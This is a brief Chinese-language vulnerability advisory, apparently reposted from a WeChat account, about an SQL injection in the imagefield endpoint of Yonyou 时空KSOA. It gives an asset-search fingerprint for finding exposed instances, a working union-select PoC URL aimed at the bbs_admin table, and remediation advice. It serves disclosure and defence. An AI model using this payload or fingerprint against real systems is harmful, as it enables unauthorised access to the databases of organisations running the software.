漏洞描述
用友时空KSOA imagefield接口存在SQL注入漏洞,黑客可以利用该漏洞执行任意SQL语句,如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。
资产测绘
app
=
"用友-时空KSOA"
漏洞复现
部分界面如下
POC
/servlet/imagefield?key=readimage&sImgname=password&sTablename=bbs_admin&sKeyname=id&sKeyvalue=-
1
%27+union+
select
+sys.fn_varbintohexstr(hashbytes(%27md5%27,%271%27))--+
修复建议
1、请联系厂商进行修复或升级到安全版本。
2、如非必要,禁止公网访问该系统。
3、设置白名单访问。
原文始发于微信公众号(十二主神):【1day】用友时空KSOA imagefield接口存在SQL注入漏洞
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论